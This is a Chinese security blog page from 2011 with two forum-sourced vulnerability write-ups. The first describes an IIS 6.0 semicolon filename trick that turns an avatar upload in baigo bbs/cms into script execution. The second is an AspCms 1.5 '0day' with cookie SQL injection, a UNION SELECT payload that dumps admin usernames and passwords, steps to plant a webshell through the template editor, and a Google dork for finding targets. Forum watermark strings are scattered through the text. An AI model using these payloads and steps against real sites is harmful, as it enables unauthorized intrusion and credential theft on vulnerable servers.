浏览模式: 标准 | 列表2011年12月的文章

baigo bbs&baigo cms

Submitted by admin
2011, December 11, 3:41 PM

来源:http://www.t00ls.net/thread-19635-1-1.html

1. - 低调求发展2 w* h: L9 K2 u% a! q; X
user_reg.asp

'注册
case "user_reg_do"

        user_name = trim(request.form("user_name"))
        user_pass = trim(request.form("user_pass"))
        user_pass_again = trim(request.form("user_pass_again"))
        user_mail = trim(request.form("user_mail"))
        user_pass_question = trim(request.form("user_pass_question"))
        user_pass_answer = trim(request.form("user_pass_answer"))
        user_sex = trim(request.form("user_sex"))
        user_www = trim(request.form("user_www"))
        user_sign = trim(request.form("user_sign"))
        user_face = trim(request.form("user_face"))
        user_qq = trim(request.form("user_qq"))
        user_msn = trim(request.form("user_msn"))
        %>
简单过滤空格
if instr(user_name,"        ") > 0 or instr(user_name,"#") > 0 or instr(user_name,"`") > 0 or instr(user_name,"|") > 0 or instr(user_name," ") > 0 or instr(user_name," ") > 0 or Instr(user_name,"%") > 0 or Instr(user_name,"&") > 0 or Instr(user_name,"ヴ") > 0 or Instr(user_name,"ヂ") > 0 or Instr(user_name,"ゼ") > 0 or Instr(user_name,"ヅ") > 0 or Instr(user_name,"") > 0 or Instr(user_name,"+") > 0 or Instr(user_name,"=") > 0  or Instr(user_name,"'") > 0 then
        session("message") = "<li>用户名中不能含有特殊符号</li>"
        session("message") = session("message") & "<li><a href=""javascript:history.back();"">返回</a></li>"
没有检测;分号   可以注册duos.asp;1的账户
X- Q* _
有个特性是注册会员上传的头像是根据自己名字来保存图片  
注册duos.asp;1的账户 ==》上传脚本.jpg==》自动保存为 duos.asp;1.jpg (这点可以利用IIS6.0的解析漏洞) - 低调求发展" w$ W1 i  E" j' l6 i6 G1 K
T00LS! ~0 C7 A6 ?/ e+ v6 I
2.
XSS很多。  这个对论坛影响较大。
Tags: baigo

漏洞分析 | 评论:0 | Trackbacks:0 | 阅读:14232

Aspcms 稳定版1.5 0day

Submitted by admin
2011, December 3, 1:45 PM

Author: Virushack

Blog: http://virushack.org

From:www.v5script.org

漏洞文件:editpass.asp

漏洞代码:

  1. Dim   linkman  gender  phone  mobile  email  qq  address  postcode 
  2. if   isnul  rCookie  “loginstatus”   ))   then   wCookie  “loginstatus”   0  
  3. if   rCookie  “loginstatus”   )=  1     then  
  4. set   rsObj  conn  Exec   “select * from aspcms_Users where UserID=” & trim  rCookie  “userID”   )),  “r1″ ) 
  5. 直接通过rCookie 取得userid带入查询.

再看看 rcookie函数的处理

  1. ‘读cookies
  2. Function rCookie(cookieName)
  3. rCookie=request.cookies(cookieName)
  4. End Function

直接通过cookies取得

利用:
注册个帐号让 loginstatus不为空
然后 cookies注入 userID 不管你手注还是工具 都行 我这是用火狐的cookies插件

Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
效果图:

大小: 8.29 K 尺寸: 300 x 95 浏览: 510 次 点击打开新窗口浏览全图

后台拿shell 就更简单了  插一句话什么都行  我这就用最稳当的方法

http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp

大小: 9.23 K 尺寸: 300 x 216 浏览: 438 次 点击打开新窗口浏览全图

http://127.0.0.1/Templates/default/html/a.asp

Google Dork: Powered by AspCms v1.5

Tags: aspcms

漏洞分析 | 评论:0 | Trackbacks:0 | 阅读:17446